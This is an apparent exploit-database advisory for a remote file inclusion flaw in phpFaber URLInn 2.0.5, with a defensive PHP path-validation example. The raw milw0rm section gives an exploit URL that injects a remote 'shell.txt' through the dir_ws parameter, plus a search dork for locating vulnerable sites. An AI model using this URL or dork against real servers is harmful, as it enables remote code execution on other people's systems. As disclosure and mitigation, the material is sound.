vendor:
phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
by:
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE
Product Name: phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Inclusion in phpFaber.URLInn.v2.0.5.PHP.NULL-DGT

This vulnerability allows an attacker to include remote files through the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerable variable is dir_ws, used at line 78 of that file: config.php builds its require_once paths from $dir_ws, and with register_globals On the value can be supplied as a GET parameter.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in file inclusion operations. Disabling the register_globals feature and keeping software up to date also help prevent this class of vulnerability.
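One way to apply this mitigation to the three includes in config.php, as an added example that is not phpFaber's code or part of the advisory. The names `urlinn_safe_path` and `URLINN_ROOT` and the temporary demo tree are assumptions made for illustration.

```php
<?php
// Added example, not phpFaber code: all names below are hypothetical.

/**
 * Return the canonical path of $relative under $root, or throw when the
 * value carries a URL/stream-wrapper scheme, is missing, or escapes $root.
 */
function urlinn_safe_path($root, $relative)
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        throw new InvalidArgumentException('scheme not allowed in include path');
    }
    $rootReal = realpath($root);
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($rootReal === false || $full === false) {
        throw new RuntimeException('include target not found');
    }
    if (strpos($full, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include target outside application root');
    }
    return $full;
}

// Constructed demo tree standing in for the application root.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'urlinn_demo_' . getmypid();
@mkdir($root . '/urlinn_includes', 0700, true);
file_put_contents($root . '/urlinn_includes/i_PageSelector.php', "<?php // constructed stub\n");

// In config.php itself the root would be fixed from the file's own location,
// e.g. define('URLINN_ROOT', dirname(dirname(__FILE__))); a constant cannot
// be overwritten by a register_globals-injected dir_ws parameter.
define('URLINN_ROOT', $root);

$candidates = array(
    'urlinn_includes/i_PageSelector.php',   // legitimate include
    'http://localhost/shell.txt?',          // value from the advisory's URL
    '../../etc/passwd',                     // traversal out of the root
);
foreach ($candidates as $rel) {
    try {
        require_once urlinn_safe_path(URLINN_ROOT, $rel);
        echo "included: $rel\n";
    } catch (Exception $e) {
        echo "rejected: $rel (" . $e->getMessage() . ")\n";
    }
}
```

Only the first candidate is included; the other two are rejected before any `require_once` runs.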

Exploit-DB raw data:

            ----------------------------------------------
              GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To
            ----------------------------------------------
              A2J, iNs, The Pitbull, ICQBomber, str0ke
            ----------------------------------------------
                     BiG sHoUt OuT tO udplink.net
            ----------------------------------------------




Vulnerability Type: Remote File Inclusion
Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php
Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: dir_ws
Line number: 78
Lines:

----------------------------------------------
require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php");
require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php");
require_once("$dir_ws/urlinn_includes/i_PageSelector.php");

----------------------------------------------


               ----------------------------------------------
                        FoUnD By BiNgZa AKA RaZor
               ----------------------------------------------
               DoRk:Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber
               ----------------------------------------------
                        shadowcrew@hotmail.co.uk
               ----------------------------------------------
                          shadow.php0h.com
               ----------------------------------------------

# milw0rm.com [2007-10-30]